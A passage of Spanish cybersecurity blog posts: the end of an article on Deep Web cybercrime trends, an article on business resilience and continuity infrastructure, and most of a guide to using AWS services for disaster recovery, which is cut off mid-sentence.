utilizan en Microsoft Windows para colocar malware y eludir las restricciones administrativas. Una de las vulnerabilidades más interesantes relacionadas con la omisión de controles de seguridad y AntiVirus es la omisión de UAC (User Account Control) utilizada en el famoso troyano bancario Carberp por "auto-elevación" para ciertos procesos iniciados desde explorer.exe e inyectados en explorer.exe. Otras áreas de interés para las comunidades de cibercriminales de Deep Web son: - Uso de Malware móvil. La banca móvil será el sector más afectado según los expertos en ciberseguridad, se espera una nueva ola de ciberataques, las instituciones financieras y sus usuarios serán víctimas de una nueva ofensiva, especialmente contra todos los servicios implementados en las plataformas móviles. - Vulnerabilidades en el sector industrial y lo que conocemos como Indrustria 4.0. El interés de los hackers se puede dividir en fraude financiero en la industria (especialmente en el sector del petróleo y el gas) y ataques remotos a las infraestructuras SCADA / ICS. La mayoría de las vulnerabilidades relacionadas con dicho segmento se encuentran en las interfaces de aplicaciones SCADA y sus módulos de aplicaciones WEB. Los ataques remotos tienen como objetivos principales el ciberespionaje como inteligencia comercial ofensiva o vandalismo "solo por diversión". ## Cibercrimen, una lucha sin un final a la vista La lucha contra el delito de ciberseguridad es una ardua tarea, un enfrentamiento interminable entre las fuerzas y cuerpos del estado y los grupos de ciberdelincuentes que están creciendo bajo los aspectos de la organización y que pueden proporcionar productos y servicios cada vez más avanzados, cada vez a un menor coste, y cada vez en un menor tiempo. El cibercrimen es un fenómeno mundial que amenaza la economía y la seguridad de todos los estados, y solo se llegara a luchar contra ellos con la colaboración en ciberseguridad. Se debe exponer información a la gente común a través de una campaña de concientización. Las empresas privadas y los gobiernos deben colaborar para supervisar las actividades delictivas y detectarlas lo antes posible a través de Internet. La detección de actividades ilegales o comportamientos sospechosos en cuanto a ciberseguridad se refiere, podrian mejorarse utilizando sistemas de inteligencia de seguridad como SOAR , la definición y participación de las mejores prácticas de seguridad es otro aspecto que podría limitar el nivel de penetración en las empresas privadas y moderar el coste de estos ciberataques. Por ejemplo, la posibilidad de evitar ataques de spear phishing debido a una campaña de concienciación adecuada. Por supuesto, todas estas razones deben estar respaldadas por el establecimiento de un marco legal aceptado globalmente que castigue severamente a los ciberdelincuentes en todos los lugares donde operan. Desafortunadamente, todavía estamos lejos de estas condiciones que son absolutamente necesarias para hacer frente a una industria que no conoce crisis y que muestra un crecimiento aterrador. Los ciberdelincuentes, evolucionan muy rápido, tanto, que al cierre y busqueda de conclusiones, he dado con un post de Panda, que ha tirado por tierra todo el post, y es que, los cibercriminales se estan mudando, y la Deep Web, ya esta obsoleta, hay mucha gente vigilando, mucha gente en foros, conocen cómo funcionan, y por eso, se marchan a la Invisible Net (La analizaremos para hacer un post algún día) --- # Resiliencia digital: el factor que decide si tu negocio sobrevive o se apaga URL: https://ciberseguridad.blog/resiliencia-digital-el-factor-que-decide-si-tu-negocio-sobrevive-o-se-apaga/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-08-22 Actualizado: 2026-10-04 Tema: Compliance > ¿Tu negocio sobrevivirá a la próxima crisis? Descubre por qué esta estrategia es la clave para proteger tu empresa de ciberataques y fallos. En su casi aniversario, creo que al menos deberíamos recordarlo y volver a repasar tan fatídico día. El 17 de julio de 2024 quedó marcado en la memoria de miles de empresas como el día en que todo se detuvo. Un fallo masivo en los sistemas de CrowdStrike provocó la caída simultánea de más de 8,5 millones de dispositivos Windows en todo el planeta. Las consecuencias fueron inmediatas y demoledoras: aerolíneas como Delta perdieron 500 millones de dólares en pocas horas, bancos internacionales se vieron obligados a cerrar sucursales enteras, y hospitales en distintos países tuvieron que pasar a funcionamiento manual en plena actividad crítica, con el riesgo que ello implica para pacientes y personal médico. > En apenas 24 horas, las pérdidas globales superaron los 5.400 millones de dólares, según estimaciones de Parametrix. Lo más alarmante es que este no fue un caso aislado ni un fenómeno excepcional. El informe de IBM Security 2024 revela que el coste promedio de una brecha de datos ya alcanza los 4,88 millones de dólares, mientras que el tiempo medio de recuperación tras un ciberataque se sitúa en 287 días. Eso significa que, desde que ocurre el incidente hasta que la empresa vuelve a la normalidad, pueden pasar nueve meses completos de impacto continuado en operaciones, ingresos y reputación. Estos datos son una advertencia clara: la dependencia de la infraestructura tecnológica es absoluta, y no contar con un plan de continuidad de negocio robusto es jugar a la ruleta rusa empresarial. ## Los servidores: mucho más que máquinas, el corazón que impulsa la operación Cuando se habla de servidores, muchas personas imaginan grandes máquinas llenas de cables, aisladas en una sala técnica. Pero en realidad, son la columna vertebral tecnológica que sostiene la actividad de toda la organización. Sin ellos, ningún proceso clave funcionaría. Estos sistemas son responsables de gestionar bases de datos críticas, dar soporte a aplicaciones empresariales complejas y garantizar que los procesos más sensibles —aquellos que definen la competitividad y la capacidad operativa— nunca se detengan. En la práctica: - En el sector financiero, los servidores procesan transacciones por valor de billones de euros cada día, asegurando que los pagos, transferencias y operaciones bursátiles ocurran de forma instantánea y segura. - En comercio electrónico, son capaces de soportar incrementos repentinos del tráfico, multiplicando por diez la demanda habitual durante campañas como Black Friday o Prime Day. - En industria y manufactura, permiten coordinar cadenas de suministro globales, optimizar inventarios just-in-time y garantizar la trazabilidad completa de los productos desde su origen hasta el cliente final. La ecuación es simple: si el servidor se detiene, la empresa entera se detiene. ## Un ecosistema de aplicaciones críticas que no puede fallar El ERP (Enterprise Resource Planning) es el núcleo que coordina todos los procesos internos. Herramientas como SAP, Oracle o Microsoft Dynamics integran módulos financieros, de recursos humanos, compras, ventas y producción en una única plataforma centralizada. Si esta infraestructura falla, el impacto no es parcial: la actividad completa se paraliza. Junto a él, los CRM (Customer Relationship Management) como Salesforce o Dynamics 365 gestionan la relación con los clientes. Aquí se almacena el historial de interacciones, preferencias de compra, segmentaciones y estrategias de fidelización. Si un CRM deja de estar disponible, se pierden oportunidades comerciales al instante y se deteriora la experiencia de cliente. Por último, las plataformas de Business Intelligence como Power BI o Tableau procesan grandes volúmenes de datos y ofrecen análisis en tiempo real para la toma de decisiones estratégicas. Una caída en estos sistemas significa decidir a ciegas en momentos clave, como inversiones, lanzamiento de productos o expansiones de mercado. ## Tres pilares para una infraestructura que no se detiene 1. Alta disponibilidad : Las arquitecturas de redundancia activa-activa o activa-pasiva son esenciales para minimizar el riesgo de interrupciones. Mientras un servidor convencional puede experimentar entre un 1 % y un 2 % de inactividad anual, los sistemas empresariales de alto nivel logran disponibilidades del 99,99 %, lo que equivale a menos de una hora de caída al año. En sectores como banca, salud o comercio electrónico, esa diferencia es crítica: cada minuto cuenta y se traduce en dinero y reputación. 2. Automatización inteligente: La eficiencia no depende solo del hardware. La automatización de procesos repetitivos es clave para reducir errores y liberar tiempo de los equipos. Acciones como generar informes, actualizar inventarios, enviar comunicaciones masivas o realizar backups se ejecutan de forma automática, sin intervención humana directa. Esto permite que los profesionales se centren en tareas estratégicas que aportan valor real al negocio. 3. Integración fluida de sistemas: Cuando los sistemas empresariales se comunican de forma nativa, los silos de información desaparecen y los flujos de trabajo se agilizan. Un pedido que entra por el sistema comercial actualiza automáticamente el inventario, programa la entrega, emite la factura y ajusta los indicadores financieros en tiempo real. Esto crea un ecosistema digital cohesionado, rápido y preparado para adaptarse a cualquier cambio del mercado. ## Ciberseguridad: el pilar invisible que sostiene la continuidad [Imagen: Diagrama circular con las ocho fases de un programa de continuidad de negocio] En el panorama actual, la ciberseguridad es tan importante como la propia infraestructura. El Informe Global de Riesgos 2024 del Foro Económico Mundial sitúa los ciberataques entre las cinco amenazas más probables y de mayor impacto para las organizaciones a nivel mundial. Según el Informe de Violaciones de Datos de Verizon 2024: - El 68% de las brechas de seguridad involucran factores humanos: errores, abuso de privilegios o interacciones con atacantes. - El 24% de las organizaciones afectadas fueron víctimas de ransomware, con un coste medio de 2,73 millones de dólares por incidente. ### Vectores de ataque contra servidores - Ransomware de doble extorsión: además de cifrar los datos, los atacantes roban y amenazan con publicar información sensible. - Ataques DDoS (Distributed Denial of Service): en 2024 se registró uno de 3,47 Tbps, suficiente para saturar cualquier red sin defensa adecuada. - Credential stuffing: aprovechando bases de datos de contraseñas filtradas, con un 65% de usuarios que reutilizan credenciales en servicios corporativos y personales. ## Arquitectura de seguridad multicapa: defensa en profundidad Un servicio de servidores robusto implementa varias capas de seguridad interconectadas: - NGFW (Next-Generation Firewalls): combinan inspección de paquetes, análisis de aplicaciones y detección/previsión de intrusiones. - WAF (Web Application Firewall): protegen contra vulnerabilidades web como inyección SQL, XSS o inclusión de archivos. - SOC 24/7: centros de operaciones de seguridad que combinan SIEM con análisis de comportamiento mediante IA para detectar amenazas zero-day. - Segmentación de redes y microsegmentación: limita la propagación lateral de un ataque, incluso si un sistema es comprometido. El impacto en métricas de continuidad es directo: se reducen los RTO (tiempos de recuperación) y RPO (puntos de recuperación) de forma significativa. ## Recuperación avanzada y redundancia inteligente La verdadera fortaleza de un plan de continuidad de negocio está en su capacidad de anticipar fallos y recuperarse automáticamente: - Clustering: los servidores comparten cargas de trabajo, y si uno falla, el tráfico se redirige sin que los usuarios lo noten. - Replicación geográfica: copias de datos críticos en distintas zonas geográficas para proteger ante desastres locales. - Protección continua de datos (CDP): captura cambios en tiempo real, permitiendo restaurar a cualquier momento exacto. ## Casos reales: la diferencia entre estar preparado o no Meditech Solutions : Empresa española de tecnología médica con 200 empleados y facturación de 15 millones de euros. En marzo de 2024, un ataque de ransomware fue detectado a las 02:15h por sistemas EDR. En 45 minutos ya funcionaban desde su infraestructura secundaria. Pérdida de datos: cero. TechnoMed Iberia: Mismo sector, tres meses después, misma amenaza pero sin infraestructura resiliente. Recuperación en 72 horas, pérdidas de 180.000 € en ingresos, penalizaciones contractuales por 50.000 €, 35.000 € en consultoría de emergencia y tres clientes clave perdidos. ## Sectores donde un fallo no es una opción Hay industrias en las que la interrupción de los sistemas no es solo una molestia: puede significar pérdidas millonarias en minutos o incluso poner vidas en riesgo. - Sector financiero: Banco Santander demostró en 2023 la importancia de la redundancia al mantener operativa completa durante las inundaciones de Valencia, mientras otros competidores sufrieron interrupciones de varios días. - Retail: El Corte Inglés es un ejemplo de escalabilidad ágil, capaz de absorber picos de tráfico del 2.000% en fechas como Black Friday, aprovisionando recursos adicionales en menos de tres minutos y manteniendo tiempos de respuesta inferiores a 200 milisegundos. - Logística: DHL España procesa más de 100.000 envíos diarios gracias a sistemas redundantes que aseguran que un fallo en cualquier componente no interrumpa funciones críticas como rastreo, facturación o coordinación de entregas. En todos estos casos, la infraestructura tecnológica no es un soporte auxiliar: es el núcleo que mantiene la operación en marcha. ## Tecnologías emergentes que transforman la continuidad empresarial Inteligencia artificial aplicada a la resiliencia: Los algoritmos de machine learning ya no son solo herramientas analíticas: hoy predicen fallos potenciales antes de que ocurran. Esto permite activar mantenimiento preventivo y reducir el tiempo medio entre fallos (MTBF) hasta en un 40%, según Gartner. La IA detecta anomalías sutiles, cambios en patrones de tráfico o indicadores de degradación de hardware que pasarían inadvertidos para un operador humano. Edge computing y distribución inteligente : El edge computing acerca la capacidad de procesamiento a los puntos de consumo. Esto significa que, aunque una oficina remota pierda conexión con el centro de datos principal, puede seguir operando localmente con las aplicaciones críticas, reduciendo latencia y mejorando la experiencia del usuario. Blockchain para integridad de datos: La tecnología blockchain se está probando como método para asegurar la integridad de datos críticos. Su estructura inmutable y distribuida permite verificar que las copias de seguridad o réplicas no han sido alteradas, añadiendo una capa de confianza y facilitando auditorías forenses tras un incidente. ## Evaluación continua: el camino hacia la madurez en resiliencia La resiliencia no se consigue con una única inversión; es un proceso continuo de evaluación y mejora. Metodología de assessment integral Frameworks como FAIR (Factor Analysis of Information Risk) permiten evaluar de forma cuantitativa la probabilidad e impacto de distintos riesgos. Una matriz de criticidad de procesos clasifica los sistemas en niveles según su urgencia de recuperación: - Nivel 1: RTO inferior a 1 hora. - Nivel 2: tolera hasta 4 horas de interrupción. - Nivel 3: puede aceptar hasta 24 horas sin impacto grave. Métricas clave y KPIs - MTTR (Mean Time To Recovery): mide la rapidez de restauración. - RPO efectivo: comprueba si la pérdida real de datos coincide con el objetivo planificado. - Disponibilidad efectiva: valora no solo el tiempo activo del sistema, sino su rendimiento real para el usuario final. Simulacros y pruebas reales Los ejercicios de disaster recovery deben ir más allá de restauraciones técnicas. Incluyen pruebas de coordinación entre departamentos, comunicación de crisis y hasta técnicas de chaos engineering para introducir fallos controlados en producción. Los red team exercises simulan ataques sofisticados para medir la capacidad de detección, contención y recuperación. ## Compliance y regulación: un requisito, no una opción [Imagen: Logotipos de la certificación ISO 27001 y del Esquema Nacional de Seguridad] En España y Europa, el marco normativo exige medidas específicas de continuidad y ciberseguridad. - RGPD: obliga a garantizar la disponibilidad de datos y notificar brechas en un máximo de 72 horas. - Directiva NIS2: ampliará en 2024 el número de entidades obligadas a implantar medidas de ciberseguridad, afectando a sectores críticos y esenciales. - Esquema Nacional de Seguridad (ENS): requisito para entidades que interactúan con la Administración, estableciendo medidas obligatorias de backup, redundancia y tiempos de recuperación según niveles de riesgo. En el plano internacional, certificaciones como ISO 27001 (seguridad de la información) e ISO 22301 (continuidad de negocio) no solo validan la madurez organizativa, sino que son cada vez más exigidas para acceder a determinados mercados. Informes como SOC 2 Type II aportan garantía extra a clientes y socios. ## Coste-beneficio: por qué invertir en resiliencia se paga solo Hablar de continuidad de negocio es hablar de retorno de inversión, no de gasto. Modelo de pérdidas evitadas El coste por hora de inactividad varía drásticamente: - Manufactura: ~50.000 € por hora. - Banca: hasta 500.000 € por hora. Si una infraestructura resiliente evita una única caída grave, la inversión inicial puede quedar amortizada. Amortización y beneficios colaterales Además de prevenir pérdidas, una arquitectura robusta: - Reduce un 20-30% las tareas manuales mediante automatización. - Optimiza recursos IT y consumo energético (consolidar servidores puede reducir costes hasta un 40%). - Mejora el cumplimiento normativo y evita sanciones. TCO (Total Cost of Ownership) El análisis del coste total debe incluir inversión inicial, mantenimiento, actualizaciones, formación y costes de oportunidad. En muchos casos, los servicios gestionados (managed services) ofrecen un TCO inferior al de mantener infraestructura interna, especialmente para PYMEs. ## El imperativo estratégico: actuar antes de la crisis Servidores profesionales como los Servidores IBM Power han pasado de ser simples elementos técnicos a convertirse en activos estratégicos que marcan la diferencia entre prosperar o hundirse ante una crisis. La combinación de alta disponibilidad, automatización inteligente, integración fluida y ciberseguridad multicapa no es una opción: es una obligación para competir. La diferencia entre empresas que salen fortalecidas tras una crisis y las que no se recuperan radica en tres factores: 1. Anticipar las disrupciones. 2. Responder automáticamente ante incidentes. 3. Recuperarse rápido, manteniendo la confianza de clientes y socios. ## Hoja de ruta para la implantación progresiva - Fase inicial: identificar procesos críticos, establecer backups automatizados y monitorización básica de seguridad. - Fase intermedia: añadir redundancia a sistemas clave, automatizar procedimientos de recuperación y aplicar detección avanzada de amenazas. - Fase avanzada: incorporar IA predictiva, arquitectura distribuida y orquestación de respuestas totalmente automatizadas. ## Conclusión y llamada a la acción La resiliencia empresarial no es un lujo ni un extra opcional: es la garantía de que la empresa seguirá operando incluso cuando todo lo demás falle. Las organizaciones que lo entienden e invierten hoy estarán en posición de liderar mañana. Las que lo ignoran… probablemente no tendrán una segunda oportunidad. > ¿Tu organización está preparada para seguir funcionando cuando llegue el próximo gran fallo, o simplemente intentará sobrevivirlo? --- # Usando Amazon Web Services como Disaster Recovery URL: https://ciberseguridad.blog/usando-amazon-web-services-como-disaster-recovery/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-08-03 Actualizado: 2026-10-04 Tema: Compliance > ¿Sabes que pasaría si migrases tu plan de Disaster Recovery a AWS? Tan solo ponte a hacer un TCO, una de las muchas ventajas que descubrirás . ¡ ATREVETE ! La recuperación de desastres (DR, Disaster Recovery) consiste en prepararse y recuperarse de un desastre. Cualquier evento que tenga un impacto negativo en la continuidad del negocio o en las finanzas de una empresa podría considerarse un desastre. Esto incluye fallos hardware o software, cortes de red o de energía, daños físicos, incendios o inundaciones, errores humanos o algún otro evento significativo. Para minimizar el impacto de un desastre, las empresas invierten tiempo y recursos para planificar y preparar, capacitar empleados, documentar y actualizar procesos. La cantidad de inversión para la planificación de DR para un sistema en particular puede variar dramáticamente dependiendo del coste de una interrupción potencial. Las empresas que tienen entornos físicos tradicionales normalmente deben duplicar su infraestructura para garantizar la disponibilidad de capacidad adicional en caso de un desastre. La infraestructura debe ser adquirida, instalada y mantenida de modo que esté lista para soportar los requisitos de capacidad anticipados. A lo largo del post describiremos las mejores prácticas para mejorar los procesos de recuperación ante desastres, desde inversiones mínimas hasta disponibilidad a gran escala y tolerancia a fallos, mostrando cómo podemos utilizar los servicios de AWS para reducir costes y garantizar la continuidad del negocio durante un evento de Disaster Recovery, pero antes de nada, tendremos que familiarizarnos con dos terminos que ya vimos: Recovery Time Objective (RTO) : Tiempo que toma después de una interrupción para restaurar un proceso de negocio a su nivel de servicio, según lo define el acuerdo de nivel operacional (OLA). Por ejemplo, si ocurre un desastre a las 12:00 y el RTO es de ocho horas, el proceso de DR debe restaurar el proceso de negocios al nivel de servicio aceptable para las 20:00. Recovery Point Objective (RPO): La cantidad aceptable de pérdida de datos medida en el tiempo. Por ejemplo, si ocurre un desastre a las 13:00 y el RPO es de una hora, el sistema debe recuperar todos los datos que estaban en el sistema antes de las 12:00. La pérdida de datos abarcará solo una hora, entre las 12:00 y las 13:00. [Imagen: Diagrama que ilustra los conceptos de RPO y RTO en torno a un incidente] ## Prácticas de inversión en Disaster Recivery Un enfoque tradicional de DR implica diferentes niveles de duplicación de datos e infraestructura. Los servicios empresariales críticos se configuran y mantienen en esta infraestructura y se prueban a intervalos regulares (O almenos se debería, aunque ya sabemos la realidad). La ubicación del entorno de recuperación de desastres y la infraestructura de origen deben estar a una distancia física significativa aparte para garantizar que el entorno de recuperación de desastres esté aislado de las fallas que podrían afectar el sitio de origen. Como mínimo, la infraestructura que se requiere para soportar el entorno duplicado debe incluir lo siguiente: - Instalación de la infraestructura, incluida la potencia y el enfriamiento. - Seguridad para garantizar la protección física de los activos. - Capacidad adecuada para escalar el entorno. - Soporte para reparar, reemplazar y actualizar la infraestructura. - Acuerdos contractuales con un proveedor de servicios de Internet (ISP) para proporcionar conectividad a Internet (Si somos ISP, debemos tener en cuenta que puede ser nuestra propia red la afectada, necesitando estos acuerdos si o si con otro ISP.) - Infraestructura de red, como cortafuegos, enrutadores, conmutadores y balanceadores de carga. - Suficiente capacidad de servidor para ejecutar todos los servicios de misión crítica, incluidos los dispositivos de almacenamiento para los datos de respaldo, y servidores para ejecutar aplicaciones y servicios backend, como autenticación de usuario, Sistema de nombres de dominio (DNS), (DHCP), monitorización ... ### Servicios AWS que necesitaras para tu Disaster Recovery Las piezas de infraestructura esenciales incluyen DNS, funciones de red y varias características de Amazon Elastic Compute Cloud (Amazon EC2) que vamos a describir. Los servicios web de Amazon están disponibles en varias regiones del mundo, por lo que podremos elegir la ubicación más adecuada para nuestro DR. AWS tiene múltiples regiones de propósito general en América, EMEA y Asia Pacífico a las que cualquier persona con una cuenta de AWS puede acceder. [Imagen: Mapa mundial de regiones AWS con 66 zonas de disponibilidad marcadas en azul] #### Almacenamiento - Amazon Simple Storage Service (Amazon S3) proporciona una infraestructura de almacenamiento altamente duradera diseñada para el almacenamiento de datos primarios y de misión crítica. Los objetos se almacenan de forma redundante en múltiples dispositivos a través de múltiples instalaciones dentro de una región, diseñada para brindar una capacidad de lectura de 99.999999999% (119s) .AWS proporciona protección adicional para la protección y el archivado a través del control de versiones en Amazon S3, autenticación multifactor AWS (AWS MFA), AWS Identity and Access Management (IAM) . IAM es un servicio web que nos ayudará a controlar de forma segura el acceso a los recursos de AWS controlando quien está autenticado (ha iniciado sesión) y autorizado (tiene permisos) para utilizar recursos. [Vídeo](https://www.youtube.com/watch?v=Ul6FW4UANGc) - Amazon Glacier proporciona almacenamiento de bajo costo para archivar y respaldar datos. Los objetos (o archivos, como se conocen en Amazon Glacier) están optimizados para el acceso poco frecuente, para lo cual los tiempos de recuperación de varias horas son adecuados (Importante este dato). Amazon Glacier está diseñado para tener la misma durabilidad que la estrella s3. Y lo más sorprendente, a un coste de 0,004$/Gb. [Vídeo](https://www.youtube.com/watch?v=EKaJENJqD8E) - AWS Import / Export acelera el traslado de grandes cantidades de datos dentro y fuera de AWS mediante el uso de dispositivos de almacenamiento portátiles para el transporte. AWS Import / Export omite Internet y transfiere sus datos directamente dentro y fuera de los dispositivos de almacenamiento a través de la red interna de alta velocidad de Amazon. Para conjuntos de datos de tamaño significativo, la importación / exportación de AWS suele ser más rápida que la transferencia de Internet y más rentable que la actualización de su conectividad. Puede usar Importar / Exportar de AWS para migrar datos dentro y fuera de los depósitos de Amazon S3 y las bóvedas de Amazon Glacier o en las instantáneas de Amazon EBS. - AWS Snowball (Uno de esos inventos sencillos que pocos han pensado y que tiene mucha lógica), acelera el traslado de grandes cantidades de datos dentro y fuera de AWS mediante el uso de dispositivos de almacenamiento portátiles adaptados para su transporte. Omite Internet y transfiere sus datos directamente dentro y fuera de los dispositivos de almacenamiento. Para conjuntos de datos de tamaño significativo, la importación / exportación de AWS suele ser más rápida que la transferencia de Internet y más rentable que la actualización de la conectividad. [Vídeo](https://www.youtube.com/watch?v=9uc2DSZ1wL8) #### Computación - Amazon Elastic Compute Cloud (Amazon EC2) proporciona capacidad de cálculo redimensionable en cloud. En cuestión de minutos, podemos crear instancias de Amazon EC2, que son máquinas virtuales sobre las que tenemos control total. En el contexto de DR, la capacidad de crear rápidamente máquinas virtuales que podemos controlar es fundamental, y por ello, nos centramos en los aspectos de Amazon EC2 que son relevantes para la recuperación ante desastres. Las imágenes de máquina de Amazon están preconfiguradas con sistemas operativos, y algunas preconfiguradas con aplicaciones, así cómo configurar nuestros propias máquinas. En el contexto de DR, se recomienda encarecidamente configurar e identificar nuestras propias máquinas para que podamos iniciar las mismas como parte de nuestro procedimiento de recuperación. Dichas AMIs deben estar preconfiguradas con el sistema operativo que elijamos, más las piezas apropiadas de la pila de aplicaciones disponibles. Ahora un tema importante: Si usamos Amazon EC2 VM Import Connector nos permite importar imágenes de máquinas virtuales desde nuestro entorno existente a instancias de Amazon EC2, un punto que puede ser clave el nuestro PCN (Plan de Continuidad de Negocio) #### Redes Cuando se trata de un desastre, es muy probable que tengamos que modificar nuestra configuración de la red, almenos tendremos que apuntarlo al nuevo site. AWS ofrece varios servicios y funciones que nos permiten administrar y modificar la configuración de red. - Amazon Route 53 es un servicio web de Sistema de nombres de dominio (DNS), como ya nos iba adelantando ese número 53 :), en alta disponibilidad y escalable. Brinda a los desarrolladores y empresas una forma confiable y rentable de encaminar a los usuarios a las aplicaciones. Amazon Route 53 incluye una serie de capacidades globales de balanceo de carga (que pueden ser efectivas cuando se trata de escenarios de DR, como las comprobaciones de estado del DNS) y la capacidad de conmutación por error entre múltiples puntos finales e incluso sitios web estáticos alojados en Amazon S3. Las direcciones IP elásticas son direcciones IP estáticas diseñadas para la computación dinámica en la nube. Sin embargo, a diferencia de las direcciones IP estáticas tradicionales, las direcciones IP elásticas nos permiten enmascarar los fallos de la instancia o la Zona de disponibilidad mediante la reasignación programática de sus direcciones IP públicas a las instancias de nuestra cuenta en una región particular. Para DR, podemos pre-asignar algunas direcciones IP para los sistemas más críticos (Amazon sólo nos deja 5 y más con justificación de necesidad) para que nuestras direcciones IP ya sean conocidas antes de que ocurra un desastre. Esto puede simplificar la ejecución del plan de DR. - Elastic Load Balancing distribuye automáticamente el tráfico de aplicaciones entrantes en varias instancias de Amazon EC2. Nos permite lograr una mayor tolerancia a fallos en nuestras aplicaciones al proporcionar la capacidad de equilibrio de carga que se necesitamos. Al igual que podemos pre-asignar las direcciones IP elásticas, podemos asignar previamente el balanceador de carga para que el DNS ya sea conocido, simplificando la ejecución del plan DR. - Amazon Virtual Private Cloud (Amazon VPC) nos permite provisionar una sección privada y aislada de la cloud AWS donde podemos iniciar los recursos de AWS en una red virtual que definamos. Teniendo así control completo sobre el entorno de red virtual, incluida la selección del rango de direcciones IP, la creación de subredes y la configuración de tablas de rutas y puertas de enlace de red. Esto nos permite crear una conexión VPN entre nuestro datacenter corporativo y la VPC, y aprovechar la nube de AWS como una extensión de nuestro centro de datos corporativo. En el contexto de DR, puedemos usar Amazon VPC para extender nuestra topología de red existente hacia la cloud, siendo especialmente apropiado para recuperar aplicaciones empresariales que normalmente están en la red interna. #### Bases de datos - El Servicio de bases de datos relacionales de Amazon (Amazon RDS) facilita la configuración, el funcionamiento y la escala de una base de datos relacional en cloud. Podemos usar Amazon RDS en la fase de preparación del DR para guardar los datos críticos en una base de datos que ya se esté ejecutando, o en la fase de recuperación para ejecutar la base de datos de producción. De igual forma y pensando en el plan DR, podemos crear instantánea de los datos en distintas regiones. - AmazonDynamoDB es un servicio rápido y totalmente administrado de bases de datos NoSQL que lo hace simple y rentable para almacenar y recuperar cualquier cantidad de datos y atender cualquier nivel de tráfico de solicitudes. Tiene un rendimiento muy robusto y una latencia de milisegundos de un solo dígito. Durante la fase de recuperación de Disaster Recovery, podemos escalar sin problemas en cuestión de minutos con un solo clic o llamada a la API. - Amazon Redshift es un servicio de almacenamiento de datos rápido, totalmente administrado, a escala de petabytes que hace que sea simple y rentable analizar de manera eficiente todos nuestros datos utilizando sus herramientas de inteligencia empresarial existentes. Podemos usar Amazon Redshift en la fase de preparación del DR para capturar una instantánea del almacén de datos para almacenarlo de manera duradera en Amazon S3 . De esta forma, durante la fase de recuperación del DR, puede restaurar rápidamente nuestro almacenamiento de datos. ### Escenarios de Disaster Recovery con AWS La siguiente figura muestra un espectro de los cuatro escenarios que vamos a ver, organizado por la rapidez con que un sistema puede estar disponible para los usuarios después de un evento de recuperación ante desastres. [Imagen: Barra en degradado azul-rojo con las fases Backup, Pilot Light, Warm Standby y Multi Site] #### Backup y restauración En la mayoría de los entornos tradicionales, los datos se respaldan en cinta y se envían fuera del sitio (Por norma general). Si utilizamos este método, puede llevar mucho tiempo restaurar nuestros sistemas en caso de una interrupción o desastre. Amazon S3 es un destino ideal para la copia de seguridad de datos que pueden ser necesarios rápidamente para realizar una restauración. La transferencia de datos hacia y desde Amazon S3 generalmente se realiza a través de la red y, por lo tanto, es accesible desde cualquier ubicación. Existen muchas soluciones de respaldo comerciales y de código abierto que se integran además de poder usar AWS Import / Export para transferir conjuntos de datos muy grandes enviando dispositivos de almacenamiento directamente a AWS (Teniendo en cuenta que esto deberíamos hacerlo previamente). También existe Amazon Glacier, que tiene el mismo modelo de durabilidad que Amazon S3. Amazon Glacier es una alternativa de bajo coste (Desde $ 0.01 GB/mes) en la que ambas se pueden usar en conjunto para producir una solución de respaldo escalonada. AWS Storage Gateway permite que se copien instantáneamente instancias de los volúmenes de datos locales en Amazon S3 para realizar copias de seguridad. Posteriormente, podemos crear volúmenes locales o volúmenes de Amazon EBS a partir de estas instantáneas. Los volúmenes almacenados en caché nos permite almacenar nuestros datos primarios en Amazon S3, pero mantenemos los datos de acceso frecuente para un acceso de baja latencia. > Todos estos sistemas de AWS pueden ser usados como reemplazo de la tradicional copia de seguridad de cinta magnética. La copia de seguridad de nuestros datos es solo la mitad de la historia. Si ocurre un desastre, deberemos recuperar los datos de manera rápida y confiable, asegurandonos que los sistemas estén configurados para retener y proteger los datos. Y algo muy importante que se nos suele olvidad: debemos probar los procesos de recuperación de datos. [Imagen: Diagrama de conexión entre centro de datos corporativo y S3 mediante Direct Connect e Internet] Pasos clave para la copia de seguridad y restauración: 1. Seleccionar una herramienta o método apropiado para hacer una copia de seguridad de los datos en AWS. 2. Asegurarnos de tener una política de retención adecuada para nuestros datos. 3. Asegurarnos de que existan medidas de seguridad adecuadas para los datos, incluidas las políticas de cifrado y acceso. 4. Probar regularmente la recuperación de estos datos y la restauración de nuestro sistema. ### Pilot Light como concepto de rápida recuperación ante desastres El “pilot light” o luz de piloto a menudo se usa para describir un escenario de DR en el que una versión mínima del entorno siempre se ejecuta en cloud o esta disponible. La idea de pilot light es una analogía que proviene del calentador de gas. En un calentador de gas, una pequeña llama que siempre está encendida puede encender rápidamente todo el quemador para calentar una casa. Este escenario es similar a un escenario de copia de seguridad y restauración. Por ejemplo, con AWS podemos mantener un pilot light configurando ejecutando los elementos centrales más críticos en AWS. En el momento de la recuperación del desastre, podemos provisionar rápidamente un entorno de producción a gran escala sobre dicho núcleo crítico del pilot light. Los elementos de infraestructura del pilot light generalmente incluyen los servidores de base de datos, que estarían replicados en Amazon EC2 o Amazon RDS. También puede haber otros datos críticos fuera de la base de datos que deben replicarse en AWS. Para provisionar el resto de la infraestructura para restaurar servicios críticos para la empresa, normalmente tendremos algunos servidores preconfigurados agrupados como Amazon Machine Images (AMI), que están listos para iniciarse en cualquier momento. Al comenzar la recuperación, las instancias de estas AMI aparecerán rápidamente con su función predefinida (por ejemplo, servidor web o de aplicaciones) dentro de la implementación. Desde el punto de vista de la red, hay dos opciones principales para la provisión: - Utilizar Elastic IPs que puedan asignarse y identificarse previamente en la fase de preparación del DR, y asociarlas con las instancias. - Utilizar Elastic Load Balancing (ELB) para distribuir el tráfico a varias instancias. Luego actualizaríamos los registros DNS para apuntar a las instancias de Amazon EC2 o apuntariamos al balanceador de carga utilizando un CNAME. Para sistemas menos críticos, podemos asegurarnos de tener los paquetes de instalación y la información de configuración disponibles en AWS, por ejemplo, en forma de una instantánea de Amazon EBS. Esto acelerará la configuración del servidor de aplicaciones, ya que podemos crear rápidamente múltiples volúmenes en múltiples zonas de disponibilidad para adjuntarlos a instancias de Amazon EC2. Luego podemos instalar y configurar los sistemas, por ejemplo, utilizando el método de copia de seguridad y restauración. El método Pilot ligth, como hemos visto, brinda un tiempo de recuperación más rápido que el método de copia de seguridad y restauración porque las piezas centrales del sistema ya se están ejecutando y se mantienen actualizadas continuamente. A todo esto, tenemos que tener en cuenta, que AWS nos permite automatizar el provisionamiento y la configuración de los recursos de infraestructura, lo que nos brindará una gran ventaja y recorte del RTO. ### Fase de preparación de Pilot ligth En esta fase, se debe 